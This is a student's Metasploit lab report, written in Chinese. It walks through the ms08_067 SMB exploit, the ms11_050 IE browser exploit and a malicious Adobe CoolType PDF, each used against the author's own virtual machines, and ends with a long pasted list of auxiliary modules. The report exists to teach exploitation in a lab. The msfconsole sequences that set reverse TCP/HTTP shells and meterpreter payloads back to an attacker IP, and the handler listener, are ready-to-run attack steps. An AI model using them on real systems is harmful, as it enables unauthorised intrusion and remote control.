Exp5 MSF基础应用
目录
基础问题回答
用自己的话解释什么是exploit,payload,encode
- exploit既可以看成是运载恶意代码的载体,也可以理解成利用漏洞进行攻击的通道
- payload是攻击的具体武器,如后门等
- encode用来编码,用于伪装
实践过程记录
一、一个主动攻击实践,如ms08_067
①攻击机:kali ②靶机:windows XP SP3(English)
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
- msf > use exploit/windows/smb/ms08_067_netapi//使用ms08_067漏洞,use后其实是漏洞所在目录路径名
- msf exploit(ms08_067_netapi) > show payloads//显示回连攻击载荷
- msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
- msf exploit(ms08_067_netapi) > set LHOST 192.168.217.132 //攻击机ip
- msf exploit(ms08_067_netapi) > set LPORT 5312 //攻击端口
- msf exploit(ms08_067_netapi) > set RHOST 192.168.217.133 //靶机ip,特定漏洞端口已经固定
- msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
- msf exploit(ms08_067_netapi) > exploit //攻击
建立会话,攻击成功结果如下:
最后,用systeminfo命令来测试一下:
- Systeminfo(命令行)显示关于计算机及其操作系统的详细配置信息,包括操作系统配置、安全信息、产品 ID 和硬件属性,如 RAM、磁盘空间和网卡。
二、一个针对浏览器的攻击,如ms11_050
①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
- msf > use windows/browser/ms11_050_mshtml_cobjectelement//使用浏览器ms11_050漏洞
- msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
- msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.217.132 //攻击机ip
- msf exploit(ms11_050_cobjectelement) > set LPORT 5312 //攻击端口固定
- msf exploit(ms11_050_cobjectelement) > set URIPATH 2015zjy //统一资源标识符路径设置
- msf exploit(ms11_050_cobjectelement) > exploit
在浏览器输入http://192.168.217.132:8080/2015zjy,IE出现数据执行保护弹窗和警告弹窗,遇到问题需关闭程序:
最后失败,提示“运行不正常的加载项或恶意加载项导致Internet Explorer关闭此网页”。尝试IE中访问特定URI,也同样失败。
为了详细了解与该漏洞有关的系统和版本号,用info查看一下详细信息,提示如下:
……
Available targets:
Id Name
-- ----
0 Automatic
1 Internet Explorer 7 on XP SP3
2 Internet Explorer 7 on Windows Vista
3 Internet Explorer 8 on XP SP3
4 Internet Explorer 8 on Windows 7
5 Debug Target (Crash)
……
但是问题并不出在靶机系统和IE版本上,解决方法是:修改Internet的安全设置
- 在IE浏览器打开“工具->Internet选项”,选择“安全”选项卡
- “该区域的安全级别”选择最低“中”,然后点击进入“自定义级别”的编辑
- 将所有括号中注释“(不安全)”的选项选择,如下所示:
- 下方重置自定义设置,选择最低级别“中”
- 点击确定,弹出的警告点击是。
- 选择“高级”选项卡,选中“允许运行或安装软件,即使签名无效”:
最后还是失败了,老师说失败很正常的嘛~而且正常情况下,攻击的漏洞肯定也是各种设置正常的情况下甚至是打了最新补丁的情况下,没人意识到会被攻击的那种漏洞,这么设置也不太现实。
三、一个针对客户端的攻击,如Adobe
①攻击机:kali ②靶机:windowsXP Professional sp2 ③Adobe版本:9.3
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
- msf > use windows/fileformat/adobe_cooltype_sing
- msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
- msf exploit(adobe_cooltype_sing) > set LHOST 192.168.217.132 //攻击机ip
- msf exploit(adobe_cooltype_sing) > set LPORT 5312 //攻击端口
- msf exploit(adobe_cooltype_sing) > set FILENAME 20155312.pdf //设置生成pdf文件的名字
- msf exploit(adobe_cooltype_sing) > exploit //攻击
成功生成20155312.pdf:
将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:
- msf > use exploit/multi/handler //进入监听模块
- msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
- msf exploit(handler) > set LHOST 192.168.217.130 //攻击机ip
- msf exploit(handler) > set LPORT 5312 //攻击端口固定
- msf exploit(handler) > exploit
然后在靶机上打开20155312.pdf文件(我的电脑非常卡,甚至看不见其中的内容,但是没关系,重要的是我们运行了它,就可以实现回连)
kali上连接成功:
靶机和攻击机都运行一下ipconfig命令,测试一下,没有问题。
靶机关闭pdf文件,则失去权限。
四、成功应用任何一个辅助模块
我们可以使用命令msf > show auxiliary 查看所有的辅助模块:
Auxiliary
=========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability
admin/android/google_play_store_uxss_xframe_rce normal Android Browser RCE Through Google Play Store XFO
admin/appletv/appletv_display_image normal Apple TV Image Remote Control
admin/appletv/appletv_display_video normal Apple TV Video Remote Control
admin/atg/atg_client normal Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
admin/aws/aws_launch_instances normal Launches Hosts in AWS
admin/backupexec/dump normal Veritas Backup Exec Windows Remote File Access
admin/backupexec/registry normal Veritas Backup Exec Server Registry Access
admin/chromecast/chromecast_reset normal Chromecast Factory Reset DoS
admin/chromecast/chromecast_youtube normal Chromecast YouTube Remote Control
admin/cisco/cisco_asa_extrabacon normal Cisco ASA Authentication Bypass (EXTRABACON)
admin/cisco/cisco_secure_acs_bypass normal Cisco Secure ACS Unauthorized Password Change
admin/cisco/vpn_3000_ftp_bypass 2006-08-23 normal Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access
admin/db2/db2rcmd 2004-03-04 normal IBM DB2 db2rcmd.exe Command Execution Vulnerability
admin/dns/dyn_dns_update normal DNS Server Dynamic Update Record Injection
admin/edirectory/edirectory_dhost_cookie normal Novell eDirectory DHOST Predictable Session Cookie
admin/edirectory/edirectory_edirutil normal Novell eDirectory eMBox Unauthenticated File Access
admin/emc/alphastor_devicemanager_exec 2008-05-27 normal EMC AlphaStor Device Manager Arbitrary Command Execution
admin/emc/alphastor_librarymanager_exec 2008-05-27 normal EMC AlphaStor Library Manager Arbitrary Command Execution
admin/firetv/firetv_youtube normal Amazon Fire TV YouTube Remote Control
admin/hp/hp_data_protector_cmd 2011-02-07 normal HP Data Protector 6.1 EXEC_CMD Command Execution
admin/hp/hp_ilo_create_admin_account 2017-08-24 normal HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation
admin/hp/hp_imc_som_create_account 2013-10-08 normal HP Intelligent Management SOM Account Creation
admin/http/allegro_rompager_auth_bypass 2014-12-17 normal Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass
admin/http/arris_motorola_surfboard_backdoor_xss 2015-04-08 normal Arris / Motorola Surfboard SBG6580 Web Interface Takeover
admin/http/axigen_file_access 2012-10-31 normal Axigen Arbitrary File Read and Delete
admin/http/cfme_manageiq_evm_pass_reset 2013-11-12 normal Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection
admin/http/cnpilot_r_cmd_exec normal Cambium cnPilot r200/r201 Command Execution as 'root'
admin/http/cnpilot_r_fpt normal Cambium cnPilot r200/r201 File Path Traversal
admin/http/contentkeeper_fileaccess normal ContentKeeper Web Appliance mimencode File Access
admin/http/dlink_dir_300_600_exec_noauth 2013-02-04 normal D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
admin/http/dlink_dir_645_password_extractor normal D-Link DIR 645 Password Extractor
admin/http/dlink_dsl320b_password_extractor normal D-Link DSL 320B Password Extractor
admin/http/foreman_openstack_satellite_priv_esc 2013-06-06 normal Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment
admin/http/hp_web_jetadmin_exec 2004-04-27 normal HP Web JetAdmin 6.5 Server Arbitrary Command Execution
admin/http/iis_auth_bypass 2010-07-02 normal MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
admin/http/intersil_pass_reset 2007-09-10 normal Intersil (Boa) HTTPd Basic Authentication Password Reset
admin/http/iomega_storcenterpro_sessionid normal Iomega StorCenter Pro NAS Web Authentication Bypass
admin/http/jboss_bshdeployer normal JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
admin/http/jboss_deploymentfilerepository normal JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment
admin/http/jboss_seam_exec 2010-07-19 normal JBoss Seam 2 Remote Command Execution
admin/http/joomla_registration_privesc 2016-10-25 normal Joomla Account Creation and Privilege Escalation
admin/http/kaseya_master_admin 2015-09-23 normal Kaseya VSA Master Administrator Account Creation
admin/http/katello_satellite_priv_esc 2014-03-24 normal Katello (Red Hat Satellite) users/update_roles Missing Authorization
admin/http/limesurvey_file_download 2015-10-12 normal Limesurvey Unauthenticated File Download
admin/http/linksys_e1500_e2500_exec 2013-02-05 normal Linksys E1500/E2500 Remote Command Execution
admin/http/linksys_tmunblock_admin_reset_bof 2014-02-19 normal Linksys WRT120N tmUnblock Stack Buffer Overflow
admin/http/linksys_wrt54gl_exec 2013-01-18 normal Linksys WRT54GL Remote Command Execution
admin/http/manage_engine_dc_create_admin 2014-12-31 normal ManageEngine Desktop Central Administrator Account Creation
admin/http/manageengine_dir_listing 2015-01-28 normal ManageEngine Multiple Products Arbitrary Directory Listing
admin/http/manageengine_file_download 2015-01-28 normal ManageEngine Multiple Products Arbitrary File Download
admin/http/manageengine_pmp_privesc 2014-11-08 normal ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
admin/http/mantisbt_password_reset 2017-04-16 normal MantisBT password reset
admin/http/mutiny_frontend_read_delete 2013-05-15 normal Mutiny 5 Arbitrary File Read and Delete
admin/http/netflow_file_download 2014-11-30 normal ManageEngine NetFlow Analyzer Arbitrary File Download
admin/http/netgear_auth_download 2016-02-04 normal NETGEAR ProSafe Network Management System 300 Authenticated File Download
admin/http/netgear_soap_password_extractor 2015-02-11 normal Netgear Unauthenticated SOAP Password Extractor
admin/http/netgear_wnr2000_pass_recovery 2016-12-20 normal NETGEAR WNR2000v5 Administrator Password Recovery
admin/http/nexpose_xxe_file_read normal Nexpose XXE Arbitrary File Read
admin/http/novell_file_reporter_filedelete normal Novell File Reporter Agent Arbitrary File Delete
admin/http/nuuo_nvrmini_reset 2016-08-04 normal NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset
admin/http/openbravo_xxe 2013-10-30 normal Openbravo ERP XXE Arbitrary File Read
admin/http/pfadmin_set_protected_alias 2017-02-03 normal Postfixadmin Protected Alias Deletion Vulnerability
admin/http/rails_devise_pass_reset 2013-01-28 normal Ruby on Rails Devise Authentication Password Reset
admin/http/scadabr_credential_dump 2017-05-28 normal ScadaBR Credentials Dumper
admin/http/scrutinizer_add_user 2012-07-27 normal Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass
admin/http/sophos_wpa_traversal 2013-04-03 normal Sophos Web Protection Appliance patience.cgi Directory Traversal
admin/http/sysaid_admin_acct 2015-06-03 normal SysAid Help Desk Administrator Account Creation
admin/http/sysaid_file_download 2015-06-03 normal SysAid Help Desk Arbitrary File Download
admin/http/sysaid_sql_creds 2015-06-03 normal SysAid Help Desk Database Credentials Disclosure
admin/http/telpho10_credential_dump 2016-09-02 normal Telpho10 Backup Credentials Dumper
admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
admin/http/tomcat_utf8_traversal 2009-01-09 normal Tomcat UTF-8 Directory Traversal Vulnerability
admin/http/trendmicro_dlp_traversal 2009-01-09 normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
admin/http/typo3_news_module_sqli 2017-04-06 normal TYPO3 News Module SQL Injection
admin/http/typo3_sa_2009_001 2009-01-20 normal TYPO3 sa-2009-001 Weak Encryption Key File Disclosure
admin/http/typo3_sa_2009_002 2009-02-10 normal Typo3 sa-2009-002 File Disclosure
admin/http/typo3_sa_2010_020 normal TYPO3 sa-2010-020 Remote File Disclosure
admin/http/typo3_winstaller_default_enc_keys normal TYPO3 Winstaller Default Encryption Keys
admin/http/ulterius_file_download normal Ulterius Server File Download Vulnerability
admin/http/vbulletin_upgrade_admin 2013-10-09 normal vBulletin Administrator Account Creation
admin/http/webnms_cred_disclosure 2016-07-04 normal WebNMS Framework Server Credential Disclosure
admin/http/webnms_file_download 2016-07-04 normal WebNMS Framework Server Arbitrary Text File Download
admin/http/wp_custom_contact_forms 2014-08-07 normal WordPress custom-contact-forms Plugin SQL Upload
admin/http/wp_easycart_privilege_escalation 2015-02-25 normal WordPress WP EasyCart Plugin Privilege Escalation
admin/http/wp_symposium_sql_injection 2015-08-18 normal WordPress Symposium Plugin SQL Injection
admin/http/wp_wplms_privilege_escalation 2015-02-09 normal WordPress WPLMS Theme Privilege Escalation
admin/http/zyxel_admin_password_extractor normal ZyXEL GS1510-16 Password Extractor
admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
admin/maxdb/maxdb_cons_exec 2008-01-09 normal SAP MaxDB cons.exe Remote Command Injection
admin/misc/sercomm_dump_config 2013-12-31 normal SerComm Device Configuration Dump
admin/misc/wol normal UDP Wake-On-Lan (WOL)
admin/motorola/wr850g_cred 2004-09-24 normal Motorola WR850G v4.03 Credentials
admin/ms/ms08_059_his2006 2008-10-14 normal Microsoft Host Integration Server 2006 Command Execution Vulnerability
admin/mssql/mssql_enum normal Microsoft SQL Server Configuration Enumerator
admin/mssql/mssql_enum_domain_accounts normal Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
admin/mssql/mssql_enum_domain_accounts_sqli normal Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
admin/mssql/mssql_enum_sql_logins normal Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
admin/mssql/mssql_escalate_dbowner normal Microsoft SQL Server Escalate Db_Owner
admin/mssql/mssql_escalate_dbowner_sqli normal Microsoft SQL Server SQLi Escalate Db_Owner
admin/mssql/mssql_escalate_execute_as normal Microsoft SQL Server Escalate EXECUTE AS
admin/mssql/mssql_escalate_execute_as_sqli normal Microsoft SQL Server SQLi Escalate Execute AS
admin/mssql/mssql_exec normal Microsoft SQL Server xp_cmdshell Command Execution
admin/mssql/mssql_findandsampledata normal Microsoft SQL Server Find and Sample Data
admin/mssql/mssql_idf normal Microsoft SQL Server Interesting Data Finder
admin/mssql/mssql_ntlm_stealer normal Microsoft SQL Server NTLM Stealer
admin/mssql/mssql_ntlm_stealer_sqli normal Microsoft SQL Server SQLi NTLM Stealer
admin/mssql/mssql_sql normal Microsoft SQL Server Generic Query
admin/mssql/mssql_sql_file normal Microsoft SQL Server Generic Query from File
admin/mysql/mysql_enum normal MySQL Enumeration Module
admin/mysql/mysql_sql normal MySQL SQL Generic Query
admin/natpmp/natpmp_map normal NAT-PMP Port Mapper
admin/netbios/netbios_spoof normal NetBIOS Response Brute Force Spoof (Direct)
admin/officescan/tmlisten_traversal normal TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access
admin/oracle/ora_ntlm_stealer 2009-04-07 normal Oracle SMB Relay Code Execution
admin/oracle/oracle_login 2008-11-20 normal Oracle Account Discovery
admin/oracle/oracle_sql 2007-12-07 normal Oracle SQL Generic Query
admin/oracle/oraenum normal Oracle Database Enumeration
admin/oracle/osb_execqr 2009-01-14 normal Oracle Secure Backup exec_qr() Command Injection Vulnerability
admin/oracle/osb_execqr2 2009-08-18 normal Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
admin/oracle/osb_execqr3 2010-07-13 normal Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability
admin/oracle/post_exploitation/win32exec 2007-12-07 normal Oracle Java execCommand (Win32)
admin/oracle/post_exploitation/win32upload 2005-02-10 normal Oracle URL Download
admin/oracle/sid_brute 2009-01-07 normal Oracle TNS Listener SID Brute Forcer
admin/oracle/tnscmd 2009-02-01 normal Oracle TNS Listener Command Issuer
admin/pop2/uw_fileretrieval 2000-07-14 normal UoW pop2d Remote File Retrieval Vulnerability
admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
admin/postgres/postgres_sql normal PostgreSQL Server Generic Query
admin/sap/sap_configservlet_exec_noauth 2012-11-01 normal SAP ConfigServlet OS Command Execution
admin/sap/sap_mgmt_con_osexec normal SAP Management Console OSExecute
admin/scada/advantech_webaccess_dbvisitor_sqli 2014-04-08 normal Advantech WebAccess DBVisitor.dll ChartThemeConfig SQL Injection
admin/scada/ge_proficy_substitute_traversal 2013-01-22 normal GE Proficy Cimplicity WebView substitute.bcl Directory Traversal
admin/scada/modicon_command 2012-04-05 normal Schneider Modicon Remote START/STOP Command
admin/scada/modicon_password_recovery 2012-01-19 normal Schneider Modicon Quantum Password Recovery
admin/scada/modicon_stux_transfer 2012-04-05 normal Schneider Modicon Ladder Logic Upload/Download
admin/scada/moxa_credentials_recovery 2015-07-28 normal Moxa Device Credential Retrieval
admin/scada/multi_cip_command 2012-01-19 normal Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands
admin/scada/phoenix_command 2015-05-20 normal PhoenixContact PLC Remote START/STOP Command
admin/scada/yokogawa_bkbcopyd_client 2014-08-09 normal Yokogawa BKBCopyD.exe Client
admin/serverprotect/file normal TrendMicro ServerProtect File Access
admin/smb/check_dir_file normal SMB Scanner Check File/Directory Utility
admin/smb/delete_file normal SMB File Delete Utility
admin/smb/download_file normal SMB File Download Utility
admin/smb/list_directory normal SMB Directory Listing Utility
admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
admin/smb/psexec_command normal Microsoft Windows Authenticated Administration Utility
admin/smb/psexec_ntdsgrab normal PsExec NTDS.dit And SYSTEM Hive Download Utility
admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
admin/smb/upload_file normal SMB File Upload Utility
admin/sunrpc/solaris_kcms_readfile 2003-01-22 normal Solaris KCMS + TTDB Arbitrary File Read
admin/tftp/tftp_transfer_util normal TFTP File Transfer Utility
admin/tikiwiki/tikidblib 2006-11-01 normal TikiWiki Information Disclosure
admin/upnp/soap_portmapping normal UPnP IGD SOAP Port Mapping Utility
admin/vmware/poweroff_vm normal VMWare Power Off Virtual Machine
admin/vmware/poweron_vm normal VMWare Power On Virtual Machine
admin/vmware/tag_vm normal VMWare Tag Virtual Machine
admin/vmware/terminate_esx_sessions normal VMWare Terminate ESX Login Sessions
admin/vnc/realvnc_41_bypass 2006-05-15 normal RealVNC NULL Authentication Mode Bypass
admin/vxworks/apple_airport_extreme_password normal Apple Airport Extreme Password Extraction (WDBRPC)
admin/vxworks/dlink_i2eye_autoanswer normal D-Link i2eye Video Conference AutoAnswer (WDBRPC)
admin/vxworks/wdbrpc_memory_dump normal VxWorks WDB Agent Remote Memory Dump
admin/vxworks/wdbrpc_reboot normal VxWorks WDB Agent Remote Reboot
admin/webmin/edit_html_fileaccess 2012-09-06 normal Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
admin/webmin/file_disclosure 2006-06-30 normal Webmin File Disclosure
admin/zend/java_bridge 2011-03-28 normal Zend Server Java Bridge Design Flaw Remote Code Execution
analyze/jtr_aix normal John the Ripper AIX Password Cracker
analyze/jtr_crack_fast normal John the Ripper Password Cracker (Fast Mode)
analyze/jtr_linux normal John the Ripper Linux Password Cracker
analyze/jtr_mssql_fast normal John the Ripper MS SQL Password Cracker (Fast Mode)
analyze/jtr_mysql_fast normal John the Ripper MySQL Password Cracker (Fast Mode)
analyze/jtr_oracle_fast normal John the Ripper Oracle Password Cracker (Fast Mode)
analyze/jtr_postgres_fast normal John the Ripper Postgres SQL Password Cracker
bnat/bnat_router normal BNAT Router
bnat/bnat_scan normal BNAT Scanner
client/hwbridge/connect normal Hardware Bridge Session Connector
client/mms/send_mms normal MMS Client
client/sms/send_text normal SMS Client
client/smtp/emailer normal Generic Emailer (SMTP)
crawler/msfcrawler normal Metasploit Web Crawler
docx/word_unc_injector normal Microsoft Word UNC Path Injector
dos/android/android_stock_browser_iframe 2012-12-01 normal Android Stock Browser Iframe DOS
dos/cisco/ios_http_percentpercent 2000-04-26 normal Cisco IOS HTTP GET /%% Request Denial of Service
dos/cisco/ios_telnet_rocem 2017-03-17 normal Cisco IOS Telnet Denial of Service
dos/dhcp/isc_dhcpd_clientid normal ISC DHCP Zero Length ClientID Denial of Service Module
dos/dns/bind_tkey 2015-07-28 normal BIND TKEY Query Denial of Service
dos/dns/bind_tsig 2016-09-27 normal BIND TKEY Query Denial of Service
dos/freebsd/nfsd/nfsd_mount normal FreeBSD Remote NFS RPC Request Denial of Service
dos/hp/data_protector_rds 2011-01-08 normal HP Data Protector Manager RDS DOS
dos/http/3com_superstack_switch 2004-06-24 normal 3Com SuperStack Switch Denial of Service
dos/http/apache_commons_fileupload_dos 2014-02-06 normal Apache Commons FileUpload and Apache Tomcat DoS
dos/http/apache_mod_isapi 2010-03-05 normal Apache mod_isapi Dangling Pointer
dos/http/apache_range_dos 2011-08-19 normal Apache Range Header DoS (Apache Killer)
dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
dos/http/brother_debut_dos 2017-11-02 normal Brother Debut http Denial Of Service
dos/http/canon_wireless_printer 2013-06-18 normal Canon Wireless Printer Denial Of Service
dos/http/dell_openmanage_post 2004-02-26 normal Dell OpenManage POST Request Heap Overflow (win32)
dos/http/f5_bigip_apm_max_sessions normal F5 BigIP Access Policy Manager Session Exhaustion Denial of Service
dos/http/gzip_bomb_dos 2004-01-01 normal Gzip Memory Bomb Denial Of Service
dos/http/hashcollision_dos 2011-12-28 normal Hashtable Collisions
dos/http/ibm_lotus_notes 2017-08-31 normal IBM Notes encodeURI DOS
dos/http/ibm_lotus_notes2 2017-08-31 normal IBM Notes Denial Of Service
dos/http/monkey_headers 2013-05-30 normal Monkey HTTPD Header Parsing Denial of Service (DoS)
dos/http/ms15_034_ulonglongadd normal MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
dos/http/nodejs_pipelining 2013-10-18 normal Node.js HTTP Pipelining Denial of Service
dos/http/novell_file_reporter_heap_bof 2012-11-16 normal NFR Agent Heap Overflow Vulnerability
dos/http/rails_action_view 2013-12-04 normal Ruby on Rails Action View MIME Memory Exhaustion
dos/http/rails_json_float_dos 2013-11-22 normal Ruby on Rails JSON Processor Floating Point Heap Overflow DoS
dos/http/slowloris 2009-06-17 normal Slowloris Denial of Service Attack
dos/http/sonicwall_ssl_format 2009-05-29 normal SonicWALL SSL-VPN Format String Vulnerability
dos/http/ua_parser_js_redos normal ua-parser-js npm module ReDoS
dos/http/webrick_regex 2008-08-08 normal Ruby WEBrick::HTTP::DefaultFileHandler DoS
dos/http/wordpress_directory_traversal_dos normal WordPress Traversal Directory DoS
dos/http/wordpress_long_password_dos 2014-11-20 normal WordPress Long Password DoS
dos/http/wordpress_xmlrpc_dos 2014-08-06 normal Wordpress XMLRPC DoS
dos/http/ws_dos normal ws - Denial of Service
dos/mdns/avahi_portzero 2008-11-14 normal Avahi Source Port 0 DoS
dos/misc/dopewars 2009-10-05 normal Dopewars Denial of Service
dos/misc/ibm_sametime_webplayer_dos 2013-11-07 normal IBM Lotus Sametime WebPlayer DoS
dos/misc/ibm_tsm_dos 2015-12-15 normal IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service
dos/misc/memcached normal Memcached Remote Denial of Service
dos/ntp/ntpd_reserved_dos 2009-10-04 normal NTP.org ntpd Reserved Mode Denial of Service
dos/pptp/ms02_063_pptp_dos 2002-09-26 normal MS02-063 PPTP Malformed Control Data Kernel Denial of Service
dos/rpc/rpcbomb normal RPC DoS targeting *nix rpcbind/libtirpc
dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow
dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow
dos/sap/sap_soap_rfc_eps_delete_file normal SAP SOAP EPS_DELETE_FILE File Deletion
dos/scada/beckhoff_twincat 2011-09-13 normal Beckhoff TwinCAT SCADA PLC 2.11.0.2004 DoS
dos/scada/d20_tftp_overflow 2012-01-19 normal General Electric D20ME TFTP Server Buffer Overflow DoS
dos/scada/igss9_dataserver 2011-12-20 normal 7-Technologies IGSS 9 IGSSdataServer.exe DoS
dos/scada/yokogawa_logsvr 2014-03-10 normal Yokogawa CENTUM CS 3000 BKCLogSvr.exe Heap Buffer Overflow
dos/smb/smb_loris 2017-07-29 normal SMBLoris NBSS Denial of Service
dos/smtp/sendmail_prescan 2003-09-17 normal Sendmail SMTP Address prescan Memory Corruption
dos/solaris/lpd/cascade_delete normal Solaris LPD Arbitrary File Delete
dos/ssl/dtls_changecipherspec 2000-04-26 normal OpenSSL DTLS ChangeCipherSpec Remote DoS
dos/ssl/dtls_fragment_overflow 2014-06-05 normal OpenSSL DTLS Fragment Buffer Overflow DoS
dos/ssl/openssl_aesni 2013-02-05 normal OpenSSL TLS 1.1 and 1.2 AES-NI DoS
dos/syslog/rsyslog_long_tag 2011-09-01 normal rsyslog Long Tag Off-By-Two DoS
dos/tcp/claymore_dos 2018-02-06 normal Claymore Dual GPU Miner Format String dos attack
dos/tcp/junos_tcp_opt normal Juniper JunOS Malformed TCP Option
dos/tcp/synflood normal TCP SYN Flooder
dos/upnp/miniupnpd_dos 2013-03-27 normal MiniUPnPd 1.4 Denial of Service (DoS) Exploit
dos/windows/appian/appian_bpm 2007-12-17 normal Appian Enterprise Business Suite 5.6 SP1 DoS
dos/windows/browser/ms09_065_eot_integer 2009-11-10 normal Microsoft Windows EOT Font Table Directory Integer Overflow
dos/windows/ftp/filezilla_admin_user 2005-11-07 normal FileZilla FTP Server Admin Interface Denial of Service
dos/windows/ftp/filezilla_server_port 2006-12-11 normal FileZilla FTP Server Malformed PORT Denial of Service
dos/windows/ftp/guildftp_cwdlist 2008-10-12 normal Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
dos/windows/ftp/iis75_ftpd_iac_bof 2010-12-21 normal Microsoft IIS FTP Server Encoded Response Overflow Trigger
dos/windows/ftp/iis_list_exhaustion 2009-09-03 normal Microsoft IIS FTP Server LIST Stack Exhaustion
dos/windows/ftp/solarftp_user 2011-02-22 normal Solar FTP Server Malformed USER Denial of Service
dos/windows/ftp/titan626_site 2008-10-14 normal Titan FTP Server 6.26.630 SITE WHO DoS
dos/windows/ftp/vicftps50_list 2008-10-24 normal Victory FTP Server 5.0 LIST DoS
dos/windows/ftp/winftp230_nlst 2008-09-26 normal WinFTP 2.3.0 NLST Denial of Service
dos/windows/ftp/xmeasy560_nlst 2008-10-13 normal XM Easy Personal FTP Server 5.6.0 NLST DoS
dos/windows/ftp/xmeasy570_nlst 2009-03-27 normal XM Easy Personal FTP Server 5.7.0 NLST DoS
dos/windows/games/kaillera 2011-07-02 normal Kaillera 0.86 Server Denial of Service
dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
dos/windows/http/pi3web_isapi 2008-11-13 normal Pi3Web ISAPI DoS
dos/windows/llmnr/ms11_030_dnsapi 2011-04-12 normal Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
dos/windows/nat/nat_helper 2006-10-26 normal Microsoft Windows NAT Helper Denial of Service
dos/windows/rdp/ms12_020_maxchannelids 2012-03-16 normal MS12-020 Microsoft Remote Desktop Use-After-Free DoS
dos/windows/smb/ms05_047_pnp normal Microsoft Plug and Play Service Registry Overflow
dos/windows/smb/ms06_035_mailslot 2006-07-11 normal Microsoft SRV.SYS Mailslot Write Corruption
dos/windows/smb/ms06_063_trans normal Microsoft SRV.SYS Pipe Transaction No Null
dos/windows/smb/ms09_001_write normal Microsoft SRV.SYS WriteAndX Invalid DataOffset
dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
dos/windows/smb/ms09_050_smb2_session_logoff normal Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
dos/windows/smb/ms10_006_negotiate_response_loop normal Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop
dos/windows/smb/ms10_054_queryfs_pool_overflow normal Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS
dos/windows/smb/ms11_019_electbowser normal Microsoft Windows Browser Pool DoS
dos/windows/smb/rras_vls_null_deref 2006-06-14 normal Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference
dos/windows/smb/vista_negotiate_stop normal Microsoft Vista SP0 SMB Negotiate Protocol DoS
dos/windows/smtp/ms06_019_exchange 2004-11-12 normal MS06-019 Exchange MODPROP Heap Overflow
dos/windows/ssh/sysax_sshd_kexchange 2013-03-17 normal Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service
dos/windows/tftp/pt360_write 2008-10-29 normal PacketTrap TFTP Server 2.2.5459.0 DoS
dos/windows/tftp/solarwinds 2010-05-21 normal SolarWinds TFTP Server 10.4.0.10 Denial of Service
dos/wireshark/capwap 2014-04-28 normal Wireshark CAPWAP Dissector DoS
dos/wireshark/chunked 2007-02-22 normal Wireshark chunked_encoding_dissector Function DOS
dos/wireshark/cldap 2011-03-01 normal Wireshark CLDAP Dissector DOS
dos/wireshark/ldap 2008-03-28 normal Wireshark LDAP Dissector DOS
fuzzers/dns/dns_fuzzer normal DNS and DNSSEC Fuzzer
fuzzers/ftp/client_ftp normal Simple FTP Client Fuzzer
fuzzers/ftp/ftp_pre_post normal Simple FTP Fuzzer
fuzzers/http/http_form_field normal HTTP Form Field Fuzzer
fuzzers/http/http_get_uri_long normal HTTP GET Request URI Fuzzer (Incrementing Lengths)
